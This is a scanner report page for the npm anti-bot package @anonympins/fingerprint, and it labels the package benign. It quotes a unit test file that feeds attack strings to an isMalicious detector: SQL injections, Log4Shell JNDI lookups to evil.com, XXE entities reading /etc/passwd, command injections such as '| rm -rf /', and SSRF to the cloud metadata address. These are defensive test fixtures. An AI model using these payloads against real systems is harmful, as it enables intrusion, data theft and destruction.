Benign javascript Download

@anonympins/fingerprint 0.6.3

“Advanced anti-bot library for Node.js using multi-layer fingerprinting (JA3, client-side, headers), behavioral analysis, and adaptive Proof…”

Log4Shell JNDI lookup payloadExecutes shell commands synchronously
SHA-256ab47e6b674bdbfb5ceade0f7fe43a8fbdcb53ac01499f733077688519e381827
MaleculeMdTh

Evidence

Declares a malicious/benign traffic mix lines 1–25
1import {describe, expect, it} from 'vitest';
2import {isMalicious} from '../fingerprint.js';
3
4// We import the function directly to test it in isolation, avoiding vite:define errors.
5
6describe('isMalicious Unit Tests', () => {
7
8 describe('SQL and NoSQL Injections', () => {
9 it.each([
10 ["' OR '1'='1'"],
11 ["' or '1'='1' --"],
12 ["UNION SELECT username, password FROM users"],
13 ["; DROP TABLE products;--"],
14 ["SLEEP(5)"],
15 ["BENCHMARK(10000,MD5('a'))"],
16 ["WAITFOR DELAY '0:0:5'"],
17 ['{"$ne": null}'],
18 ])('should detect malicious SQL/NoSQL pattern: %s', (payload) => {
19 expect(isMalicious(payload)).toBe(true);
20 });
21
22 it.each([
23 ["A normal comment -- for a blog post."],
24 ["Please select your union representative."],
25 ["The pri …
Log4Shell JNDI lookup payload lines 29–39
29:9… });
30 });
31
32 describe('Log4Shell (JNDI Injection)', () => {
33 it.each([
34 ["${jndi:ldap://evil.com/a}"],
35 ["${jndi:rmi://evil.com/a}"],
36 ["${jndi:dns://evil.com/a}"],
37 ["${JNDI:LDAP://evil.com/a}"], // Case-insensitive
38 ])('should detect Log4Shell pattern: %s', (payload) => {
39 expect(isMalicious(payload)).toBe(tru …
Unix account database path reference lines 68–72
68:12… each([
69 ['<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'],
70 ['<!ENTITY % dtd SYSTEM "http://evil.com/evil.dtd">'],
71 ])('should detect XXE pattern: %s', (payload) => {
72 expect(isMalicious( …
JavaScript call argument contains loopback lines 96–108
96:8… });
97 });
98
99 describe('Command Injection', () => {
100 it.each([
101 ["/path/to/script.sh; ls -la "],
102 ["127.0.0.1 && whoami "],
103 ["`reboot`"],
104 ["filename.txt\ncat /etc/passwd "],
105 [" | rm -rf /"], // Pipe before a dangerous command
106 ])('should detect Command Injection pattern: %s', (payload) => {
107 expect(isMalicious(payload)).toBe(true);
108 …
Cloud instance metadata link-local address lines 115–132
115 });
116 });
117
118 describe('Server-Side Request Forgery (SSRF)', () => {
119 it.each([
120 ["http://127.0.0.1/admin"],
121 ["https://localhost:8080"],
122 ["http://169.254.169.254/latest/meta-data/"],
123 ["http://[::1]/"],
124 ])('should detect SSRF pattern: %s', (payload) => {
125 expect(isMalicious(payload)).toBe(true);
126 });
127
128 it.each([
129 ["https://google.com"],
130 ["https://github.com/login"],
131 ])('should NOT detect legitimate external URL: %s', (payload) => {
132 expect(isMalicious(payload)).toBe(fal …

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.